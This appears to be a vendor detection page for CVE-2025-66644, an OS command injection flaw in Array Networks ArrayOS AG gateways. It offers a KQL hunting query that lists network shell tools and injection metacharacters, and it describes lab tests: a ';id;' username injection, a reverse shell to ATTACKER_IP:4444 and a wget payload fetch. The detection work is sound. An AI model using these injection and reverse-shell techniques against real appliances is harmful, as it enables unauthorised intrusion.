Array Networks ArrayOS AG OS Command Injection (CVE-2025-66644)
Detects exploitation of CVE-2025-66644, an OS command injection vulnerability in Array Networks ArrayOS AG. This vulnerability allows remote attackers to execute arbitrary operating system commands through the Array Networks SSL VPN/ZTNA gateway. The flaw is tracked by CISA as a Known Exploited Vulnerability (KEV), indicating active in-the-wild exploitation. Attackers may leverage this to gain initial access, establish persistence, or pivot laterally within the network.
Vulnerability Intelligence
KEV — Known ExploitedAffected Software
- Vendor
- Array Networks
- Product
- ArrayOS AG
Weakness (CWE)
Timeline
- Disclosed
- December 8, 2025
CVSS
What is CVE-2025-66644 Array Networks ArrayOS AG OS Command Injection (CVE-2025-66644)?
Array Networks ArrayOS AG OS Command Injection (CVE-2025-66644) (CVE-2025-66644) maps to the Initial Access and Execution and Lateral Movement tactics — the adversary is trying to get into your network in MITRE ATT&CK.
This page provides production-ready detection logic for Array Networks ArrayOS AG OS Command Injection (CVE-2025-66644), covering the data sources and telemetry it touches: CommonSecurityLog, Syslog, DeviceNetworkEvents. The queries below are rated critical severity at medium confidence, and ship for 7 SIEM platforms — KQL, SPL, Elastic, QRadar, Sumo, YARA-L, LogScale.
MITRE ATT&CK
let ArrayNetworksIPs = dynamic([]);
let SuspiciousCommands = dynamic(['wget', 'curl', 'chmod', 'bash', 'sh', 'nc', 'ncat', 'python', 'perl', 'ruby', '/tmp/', '/dev/shm', 'base64', 'id;', 'whoami', 'uname', '&&', '||', '`', '$()']);
union isfuzzy=true
(
CommonSecurityLog
| where DeviceVendor has_any ('Array Networks', 'ArrayNetworks')
| where Activity has_any ('command', 'exec', 'injection', 'shell', 'os')
or Message has_any (SuspiciousCommands)
| project TimeGenerated, DeviceVendor, DeviceProduct, SourceIP, DestinationIP, Activity, Message, AdditionalExtensions
| extend AlertReason = 'Array Networks device activity with suspicious command patterns'
),
(
Syslog
| where Computer has_any ('arrayos', 'array-ag', 'arrayvpn')
or ProcessName has_any ('ag', 'arrayd', 'arrayos')
| where SyslogMessage has_any (SuspiciousCommands)
| project TimeGenerated, Computer, ProcessName, SyslogMessage, HostIP
| extend AlertReason = 'ArrayOS syslog with OS command injection indicators'
),
(
DeviceNetworkEvents
| where InitiatingProcessFileName has_any ('wget', 'curl', 'nc', 'bash', 'sh', 'python')
| where InitiatingProcessParentFileName has_any ('ag', 'arrayd', 'httpd', 'nginx')
| project TimeGenerated, DeviceName, RemoteIP, RemotePort, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName
| extend AlertReason = 'Suspicious child process spawned from Array Networks gateway process'
)
| order by TimeGenerated descDetects CVE-2025-66644 exploitation via CommonSecurityLog entries from Array Networks devices containing suspicious OS command patterns, Syslog events from ArrayOS hosts with injection indicators, and endpoint telemetry showing suspicious child processes spawned from gateway processes.
Data Sources
Required Tables
False Positives
- Legitimate administrative scripts run on the Array Networks appliance by authorized personnel
- Automated monitoring or health-check tools that spawn shell commands via the gateway management interface
- Security scanning tools performing authorized vulnerability assessments against the appliance
- Patch or update processes that invoke shell utilities during maintenance windows
Sigma rule & cross-platform mapping
The detection logic for Array Networks ArrayOS AG OS Command Injection (CVE-2025-66644) (CVE-2025-66644) above is provided in a vendor-neutral
form so you can deploy it on any SIEM. The same logic is shipped here as native
KQL (Microsoft Sentinel / Defender), SPL (Splunk), Elastic (Elastic Security (EQL)), QRadar (IBM QRadar (AQL)), Sumo (Sumo Logic CSE), YARA-L (Google Chronicle / SecOps), LogScale (CrowdStrike LogScale (CQL)) queries. In Sigma terms, this detection targets the
following logsource:
logsource:
category: network_connection
product: windowsBrowse the community-maintained Sigma rules for this technique:
Platform-specific guides for CVE-2025-66644
Testing Methodology
Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1Simulate Array Networks OS Command Injection via HTTP Request
Expected signal: Web access log entry on the target appliance showing POST request to /cgi-bin/login with URL-encoded shell metacharacters (';id;') in the username parameter
- Test 2Spawn Reverse Shell from Simulated Compromised Array Gateway Process
Expected signal: Endpoint process telemetry showing bash process with parent matching gateway daemon, network telemetry showing outbound TCP connection to ATTACKER_IP:4444 from the gateway host
- Test 3Download and Execute Payload via Injected wget Command
Expected signal: Process telemetry showing wget execution with external URL argument spawned from a gateway-related parent process; DNS query for ATTACKER_IP hostname; outbound HTTP connection to ATTACKER_IP:8080
Unlock Pro Content
Get the full detection package for CVE-2025-66644 including response playbook, investigation guide, and atomic red team tests.